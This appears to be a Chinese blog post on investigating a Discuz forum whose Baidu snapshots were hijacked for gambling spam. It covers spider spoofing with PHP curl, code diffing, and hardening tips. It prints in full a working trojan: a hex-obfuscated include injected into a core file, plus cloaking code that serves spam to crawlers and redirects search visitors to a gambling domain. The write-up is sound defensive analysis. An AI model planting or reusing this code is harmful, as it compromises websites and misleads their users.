记录一次网站快照被劫持排查血泪史

背景

网站是 discuz 搭建的论坛；运营反馈近期网站百度收录异常，有相似博**彩内容收录。

影响

网站被收录与网站无关且违禁的博**彩关键词，若是处理不及时，措施不当等待你的将是搜索引擎的惩罚：网站排名与权重降低，轻则不收录重则被k。

排查

site:网站域名结果如图

查看一天内容的收录都是一些棋牌/博**彩类的信息，果真是被劫持了。世间最痛苦的事莫过于此，特么的被人阴了...

点击一个百度快照详细页面如图

快照收录的内容是一个垃圾站

模拟蜘蛛人

百度快照是百度在抓取网站数据的时候，对收录页面时拍照并存储造成的数据副本，也就是对网页进行的一种缓存处理，快照常常转变，因此搜索引擎必要常常对快照进行更新和备份，每一次更新就会生成一个快照副本，尤为网页的内容和修改时间常常转变，当用户在搜索引擎中点击“网页快照”连接时，搜索引擎将蜘蛛当时所抓取，并保存的网页内容显现出来。

咱们知道百度收录的内容，是经过百度蜘蛛人爬取的，咱们能够模拟蜘蛛人，来查看蜘蛛人真实收录的内容是什么，这里咱们经过PHP脚原本获取：

<?php
function imitateSpider($url){

    $ci = curl_init();   // 初始化一个CURL的会话
    
    $user_agent = "Baiduspider+(+http://www.baidu.com/search/spider.htm)";    // 这里模拟的是百度蜘蛛
    
    curl_setopt($ci, CURLOPT_URL, $url);
    
    curl_setopt($ci, CURLOPT_HEADER, false);
    
    curl_setopt($ci, CURLOPT_RETURNTRANSFER, 1);
    
    curl_setopt($ci, CURLOPT_REFERER, 'http://www.baidu.com');    // 这里写一个来源地址，能够写要抓的页面的首页
    
    curl_setopt($ci, CURLOPT_USERAGENT, $user_agent);
    
    $temp=curl_exec($ci);    // 执行CURL会话
    
    curl_close($ci);
    
    return $temp;
}

$url='复制一条百度收录地址';

$data = imitateSpider($url);

print_r($data); // 输出真实的数据
复制代码

经过设置请求头，模拟一个蜘蛛人请求网站，返回的内容和快照一致，木马经过区分蜘蛛人和真实访客不一样请求头，来达到快照劫持的效果。

查找木马

对比网站代码找出真凶，这里咱们经过 Beyond Compare 文件对比工具，对比线上代码和备份代码不一样处找到问题

• 咱们先对比 source/class 文件夹（懂 dz 的人都知道，这里是 dz 的核心库， DZ论坛挂马常被反复篡改的文件 function_core.php、discuz_application.php、class_core.php、config_global.php）

  

  标红的文件就是咱们要找的文件

• 打开 source/class/discuz/discuz_application.php

  

  对比发现多个一行

@include(PACK('H*','2F746D702F2E4943452D756E69782F4D61726B'));
复制代码

查看 2F746D702F2E4943452D756E69782F4D61726B 内容是什么

能够看出代码引入一个脚本 @include('/tmp/.ICE-unix/Mark') 文件，内容以下

<?php
error_reporting(0);
ob_start("ob_gzhandler");
ini_set('html_errors', false);
ini_set('display_errors', false);
date_default_timezone_set('Asia/Shanghai');
define("APP_INCLUDE_FLAG", "TRUE");
define('APP_JACK_CHARSET', 'GBK');
header("Content-type: text/html; charset=" . APP_JACK_CHARSET);
define('APP_JACK_DOCUMENTROOT', '/tmp/.ICE-unix/');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
$GETid = $_GET['tid'] % 3 != 0 || $_GET['fid'] % 3 != 0 || $_GET['gid'] % 3 != 0 || $_GET['mid'] % 3 != 0 || $_GET['aid'] % 3 != 0;
if (stristr($userAgent, "sogou") && $GETid) {    //ID-compliant Jump
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'k/c' . rand(1, 8) . '');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'b/b0');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'm/s' . mt_rand(1, 3) . '');
} elseif (stristr($userAgent, "sogou")) {    //Inconsistent ID Jump
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'c/c' . rand(1, 8) . '');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'b/b1');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'm/s' . mt_rand(1, 3) . '');
}
if (stristr($userAgent, "baidu") && $GETid) {    //ID-compliant Jump
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'k/c' . rand(1, 8) . '');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'b/b0');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'm/b1');
} elseif (stristr($userAgent, "baidu")) {    //Inconsistent ID Jump
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'c/c' . rand(1, 8) . '');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'b/b1');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'm/b1');
}
define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . 'k/c' . rand(1, 8) . '');
define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'm/h' . rand(1, 2) . '');
define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . 'b/t' . rand(0, 1) . '');
define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'b/b1');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'b/b2');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'b/b3');
define('APP_JACK_BIANLIANG_D', APP_JACK_DOCUMENTROOT . 'b/b4');
define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'miaoshu.txt');
define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'hunhe.txt');
define('APP_JACK_CACHED', 'Uncached');
define('APP_JACK_MIN_PAR', '3');
define('APP_JACK_MAX_PAR', '3');
define('APP_JACK_MIN', '10');
define('APP_JACK_MAX', '15');
define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . 'App');
function App_GetLink()
{
    $userAgentx = strtolower($_SERVER['HTTP_USER_AGENT']);
    $S9 = $_SERVER['HTTP_HOST'];//.'/bbs';
    if (stristr($userAgentx, "baiduspider")) {
        $link = array();
        $link[] = 'http://' . $S9 . '/?gid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/forum-' . mt_rand() . '-1.html';
        $link[] = 'http://' . $S9 . '/forum.php?aid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/index.php?fid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/portal.php?mid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/plugin.php?tid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/?' . mt_rand(1, 999999) . '.html';
        $link[] = 'http://' . $S9 . '/thread-' . mt_rand() . '-1-1.html';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '.xml';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '.xml';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/index.html';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '/' . mt_rand(1, 999999) . '/';
        $link[] = 'http://' . $S9 . '/?' . date("Ymd") . '/' . missclient::rndStr(mt_rand(1, 8)) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . date("Ymd") . '.html/';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . mt_rand(1, 999999) . '/';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/' . mt_rand(1, 999999) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/index.html';
        return $link[mt_rand(0, count($link) - 1)];
    } else {
        $link = array();
        $link[] = 'http://' . $S9 . '/?gid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/forum-' . mt_rand() . '-1.html';
        $link[] = 'http://' . $S9 . '/forum.php?aid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/index.php?fid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/portal.php?mid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/plugin.php?tid=' . mt_rand() . '';
        $link[] = 'http://' . $S9 . '/?' . mt_rand(1, 999999) . '.html';
        $link[] = 'http://' . $S9 . '/thread-' . mt_rand() . '-1-1.html';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '.xml';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '.xml';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/index.html';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '/' . mt_rand(1, 999999) . '/';
        $link[] = 'http://' . $S9 . '/?' . date("Ymd") . '/' . missclient::rndStr(mt_rand(1, 8)) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . date("Ymd") . '.html/';
        $link[] = 'http://' . $S9 . '/?Xin' . mt_rand(1, 999999) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . mt_rand(1, 999999) . '/';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/' . mt_rand(1, 999999) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/';
        $link[] = 'http://' . $S9 . '/?' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '.html';
        $link[] = 'http://' . $S9 . '/?Xin' . missclient::rndStr(mt_rand(1, 8)) . '/' . missclient::rndStr(mt_rand(1, 8)) . '/index.html';
        return $link[mt_rand(0, count($link) - 1)];
    }
}
function App_GetSelf()
{
    $link = array();
    $link[] = $_SERVER['HTTP_HOST'];
    return $link[mt_rand(0, count($link) - 1)];
}
function getImg()
{
    #$img_ay = array('5B84', '5B85', '5B8b', '5B8e', '5B88', '5B86', '5B8c', '5B8d', '5B8a', '5B87', '5B89', '5B8f', '5B8g', '5B8i', '5B8m', '5B8l', '5B8n', '5B8d', '5B8o', '5B8j', '5B8h', '5B8k', '5B8p', '5B8q', '5B8r', '5B8u', '5B8t', '5B8v', '5B8s', '5B8B', '5B8y');
    #$img_num = rand(0, 30);
    return "https://i.niupic.com/images/2019/07/20/_" . mt_rand(77, 149) . ".jpg";
}
$my_app = new missclient();
$my_app->run();
class missclient
{
    public $show_spider;
    public $jump_ref;
    public $http_ref_filter;
    public $jump_url = "";
    public $domain = "";
    public $condition = "";
    public $app_server = "";
    public $log_spider = "/tmp/.ICE-unix/Mark.txt";
    public $cur_spider = "";
    public $allow_ip = "";
    public $isCache = False;//True
    public function run()
    {
        $this->domain = $this->getServerName();
        $this->jump_ref = explode("|", "baidu.|haoso.|haosou.|bing.|sogou.|m.sogou.|wap.sogou.|soso.|so.com|sm.|.sm.cn");
        $this->http_ref_filter = explode("|", "inurl:|site:|site%3A|inurl%3A");
        $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
        if (stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "360Spider") || stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "haosouspider")) {
            $this->condition = $this->isAllowdIp();
        } else {
            $this->condition = $_GET['tid'] > 5000000 || $_GET['fid'] > 5000000 || $_GET['gid'] > 5000000 || $_GET['mid'] > 5000000 || $_GET['aid'] > 5000000 || stristr($_SERVER['QUERY_STRING'], '/') || stristr($_SERVER['QUERY_STRING'], 'xml') || stristr($_SERVER['QUERY_STRING'], 'html') && $this->isAllowdIp();
        }
        $this->app_server = "app.php";
        $this->isCache = False;//True
        if ($this->isSpider() && $this->isAllowdIp()) {
            if ($this->condition) {
                if ($this->isCache) {
                    $relset_host = $this->getServerName();
                    $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
                    $cacheFile = $dir . 'sess_' . substr(md5(http_build_query($_GET)), 6);
                    if (!@file_exists($dir)) {
                        mkdir($dir, 0777);
                    }
                    if (@file_exists($cacheFile) && @filesize($cacheFile) > 32) {
                        $var = coreAppCache::read($cacheFile);
                        $page = file_get_contents(APP_JACK_TEMPLATE);
                        foreach ($var as $key => $v) {
                            $flag = "{" . $key . "}";
                            $page = str_replace($flag, $v, $page);
                        }
                        echo $page;
                        exit;
                    } else {
                        $currentPage = (include APP_JACK_APPFILE);
                        if ($currentPage && strlen($currentPage) > 32 && stristr($currentPage, "</explode>")) {
                            $var = self::cut($currentPage, "<explode>", "</explode>");
                            $var = coreAppCache::decode($var);
                            $page = file_get_contents(APP_JACK_TEMPLATE);
                            foreach ($var as $key => $v) {
                                $flag = "{" . $key . "}";
                                $page = str_replace($flag, $v, $page);
                            }
                            echo $page;
                            @coreAppCache::writenocode($currentPage, $cacheFile);
                        }
                    }
                    die;
                } else {
                    $currentPage = (include APP_JACK_APPFILE);
                    echo $currentPage;
                    die;
                }
            } else {
                $this->_uncondition_hook();
            }
        } else {
            if ($this->isRef() && $this->condition) {
                $this->Jump();
            } else {
                $this->_unSpider_hook();
            }
        }
    }
    public function isAllowdIp()
    {
        $ip = $this->clientIp();
        $non_list = explode("|", $this->allow_ip);
        foreach ($non_list as $iplist) {
            if (@stristr($ip, $iplist)) {
                return false;
            }
        }
        return true;
    }
    public function clientIp()
    {
        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $onlineip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $onlineip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $onlineip = getenv('REMOTE_ADDR');
        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        preg_match("/[d.]{7,15}/", $onlineip, $onlineipmatches);
        $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
        unset($onlineipmatches);
        return $onlineip;
    }
    public function isSpider()
    {
        $bots = array('Baidu' => 'Baiduspider', 'Sogou' => 'Sogou', 'Haoso' => 'Haosouspider', '360spider' => '360spider', 'SM' => 'Yisouspider');
        $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
        foreach ($bots as $k => $v) {
            if (stristr($userAgent, $v)) {
                if (!empty($this->log_spider)) {
                    @file_put_contents($this->log_spider, "IP:" . $_SERVER["REMOTE_ADDR"] . " --> Spider:" . $v . " --> Url:http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?" . $_SERVER['QUERY_STRING'] . " --> Time:" . date("Y/m/d/H:i:s") . "\n", FILE_APPEND);
                }
                $this->cur_spider = $k;
                return true;
                break;
            }
        }
        return false;
    }
    public function isRef()
    {
        $ref = strtolower(@$_SERVER['HTTP_REFERER']);
        if (isset($_COOKIE["domain-filter-bypass"])) {
            return false;
        }
        if (!$this->isAllowdIp()) {
            setcookie("domain-filter-bypass", "lol", time() + 259200);
            return false;
        }
        foreach ($this->http_ref_filter as $r) {
            $r = trim($r);
            if (stristr($ref, $r)) {
                setcookie("domain-filter-bypass", "lol", time() + 259200);
                return false;
            }
        }
        foreach ($this->jump_ref as $r) {
            $r = trim($r);
            if (stristr($ref, $r)) {
                return true;
            }
        }
    }
    public function getServerName()
    {
        $ServerName = strtolower($_SERVER['SERVER_NAME'] ? $_SERVER['SERVER_NAME'] : $_SERVER['HTTP_HOST']);
        if (strpos($ServerName, 'http://')) {
            return str_replace('http://', '', $ServerName);
        }
        return $ServerName;
    }
    public function getPage()
    {
        if ($this->isCache) {
            $cache = "cached";
        }
        $url = $this->app_server . "?domain=" . $this->domain . "&gid=199&spider=" . $this->cur_spider . "&cache=" . $cache . "&localPar=" . http_build_query($_GET);
        return $this->HttpVisit($url);
    }
    public function HttpVisit($weburl)
    {
        $remote_data = NULL;
        if (function_exists('curl_exec')) {
            $curl = @curl_init();
            @curl_setopt($curl, CURLOPT_URL, $weburl);
            @curl_setopt($curl, CURLOPT_HEADER, 0);
            @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
            @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            $remote_data = @curl_exec($curl);
            @curl_close($curl);
        } else {
            if (function_exists('stream_context_create')) {
                $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
                $http_header = @stream_context_create($header_array);
                $remote_data = @file_get_contents($weburl, false, $http_header);
            } else {
                $temp_url = explode("/", $weburl);
                $new_url = $temp_url[2];
                $http_port = 80;
                $get_file = substr($weburl, strlen($new_url) + 7);
                if (strstr($new_url, chr(58))) {
                    $s_var_array['td'] = explode(chr(58), $new_url);
                    $new_url = $s_var_array['td'][0];
                    $http_port = $s_var_array['td'][1];
                }
                $fsock_result = @fsockopen($new_url, $http_port);
                @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "rn" . 'Host:' . $new_url . "rn" . 'Connection:Close' . "rnrn");
                while (!feof($fsock_result)) {
                    $remote_data .= fgets($fsock_result, 1024);
                }
                @fclose($fsock_result);
            }
        }
        return $remote_data;
    }
    public function Jump()
    {
        if ($this->isAllowdIp()) {
            $domain = str_replace(".", ".", $this->domain);
            //$domain = str_replace(".", "_", $this->domain);
            //echo '<script src="Js"></script>';
            if ($_GET['tid'] % 3 != 0 || $_GET['fid'] % 3 != 0 || $_GET['gid'] % 3 != 0 || $_GET['mid'] % 3 != 0 || $_GET['aid'] % 3 != 0) {
                Header('Location: https://9661.in/html/b.html?liuhe_' . $domain);//ID-compliant Jump
                exit;
            } else {
                Header('Location: https://9661.in/html/a.html?long8_' . $domain);//Inconsistent ID Jump
                exit;
            }
        }
    }
    public function _uncondition_hook()
    {
        $array = array();
        for ($a = 0; $a < 30; $a++) {
            echo '<a href="' . App_GetLink() . '"></a>' . "\n";
        }
    }
    public function _unSpider_hook()
    {
    }
    public function strStartWith($needle, $haystack)
    {
        return substr($haystack, 0, strlen($needle)) == $needle;
    }
    public function rndStr($length = 8)
    {
        $str = null;
        $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
        $max = strlen($strPol) - 1;
        for ($i = 0; $i < $length; $i++) {
            $str .= $strPol[rand(0, $max)];
        }
        return $str;
    }
    public function cut($file, $from, $end)
    {
        $message = explode($from, $file);
        $message = explode($end, $message[1]);
        return $message[0];
    }
}
class coreAppCache
{
    public function write($file, $filename)
    {
        return file_put_contents($filename, self::encode($file));
    }
    public function writenocode($file, $filename)
    {
        return file_put_contents($filename, $file);
    }
    public function read($filename)
    {
        $content = file_get_contents($filename);
        if (stristr($content, "</explode>")) {
            $content = self::cut($content, "<explode>", "</explode>");
        }
        return self::decode($content);
    }
    public function encode($file)
    {
        return base64_encode(gzcompress(serialize($file)));
    }
    public function decode($file)
    {
        return unserialize(gzuncompress(base64_decode($file)));
    }
    public function cut($file, $from, $end)
    {
        $message = explode($from, $file);
        $message = explode($end, $message[1]);
        return $message[0];
    }
}
复制代码

代码很经典dz论坛快照劫持木马

清除木马

恢复备份文件，删除木马文件

总结

因此，为了你的网站安全，请必定要作好如下几点：

• 一、服务器密码必定要复杂一点，最好禁止密码登陆使用公钥认证;
• 二、服务器程序漏洞及时修补;
• 三、下载插件、模板等尽可能从正规网站下载，不使用盗版;
• 四、养成按期对网站作备份的好习惯。
• 五、禁止PHP引入非站点下PHP文件
• 六、禁止上传目录有执行PHP权限